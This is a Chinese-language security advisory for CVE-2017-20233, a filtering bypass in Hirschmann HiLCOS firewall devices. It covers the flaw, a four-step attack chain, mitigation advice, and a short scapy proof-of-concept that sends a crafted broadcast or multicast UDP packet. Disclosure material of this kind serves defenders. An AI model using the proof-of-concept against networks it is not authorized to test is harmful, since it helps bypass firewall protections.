CVE-2017-20233 CVSS 5.4 中危

CVE-2017-20233 Hirschmann HiLCOS防火墙过滤绕过漏洞

披露日期: 2026-04-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2017-20233

漏洞类型

安全限制绕过

CVSS评分

5.4 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Hirschmann HiLCOS (OpenBAT, BAT450, WLC, BAT867)

漏洞概述

Hirschmann HiLCOS系列产品（包括OpenBAT、BAT450、WLC、BAT867）存在防火墙过滤漏洞。当管理IP地址过滤功能被禁用时，系统无法正确过滤IPv4组播和广播流量，导致预设的防火墙规则被绕过。具有网络访问权限的攻击者可利用此缺陷注入或观察本应被阻止的组播和广播数据包。

技术细节

该漏洞源于Hirschmann HiLCOS设备Layer 2防火墙在特定配置下的逻辑缺陷。当设备禁用“管理IP地址过滤”功能时，防火墙对IPv4组播和广播数据包的处理机制失效，未能正确应用已配置的过滤规则，导致规则被绕过。攻击者无需用户交互或身份认证，只需处于邻接网络位置，即可构造特制的组播或广播数据包发送至目标网络。由于防火墙未拦截，攻击者可成功注入恶意数据或嗅探敏感流量，从而影响数据的机密性和完整性。

攻击链分析

STEP 1

侦察

攻击者识别网络中的Hirschmann HiLCOS设备，并确定其管理IP地址过滤功能处于禁用状态。

STEP 2

定位

攻击者连接到目标设备所在的同一网络邻接区域（AV:A），获取网络访问权限。

STEP 3

利用

攻击者向网络发送特制的IPv4组播或广播数据包，触发防火墙过滤逻辑缺陷。

STEP 4

影响

恶意数据包绕过防火墙规则，攻击者成功注入数据或拦截本应被屏蔽的流量。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2017-20233
# This script demonstrates sending multicast/broadcast traffic that may bypass the firewall.
# Requires: scapy

from scapy.all import *
import sys

def send_bypass_traffic(target_ip):
    # Craft a broadcast packet (e.g., to 255.255.255.255) or multicast
    # This traffic simulates what should be blocked but might pass through
    pkt = IP(dst=target_ip) / UDP(dport=1900) / Raw(load="CVE-2017-20233 Test Payload")
    
    print(f"[*] Sending test packet to {target_ip}...")
    send(pkt, verbose=0)
    print("[+] Packet sent. Verify if traffic bypassed the device firewall.")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python poc.py <broadcast_or_multicast_ip>")
        sys.exit(1)
    send_bypass_traffic(sys.argv[1])

影响范围

Hirschmann HiLCOS OpenBAT

Hirschmann HiLCOS BAT450

Hirschmann HiLCOS WLC

Hirschmann HiLCOS BAT867

防御指南

临时缓解措施

建议立即联系Hirschmann（Belden）技术支持获取并安装修复补丁。作为临时缓解措施，应在网络架构的上游路由器或交换机层面配置ACL（访问控制列表），明确限制IPv4组播和广播流量的传播，减少潜在攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表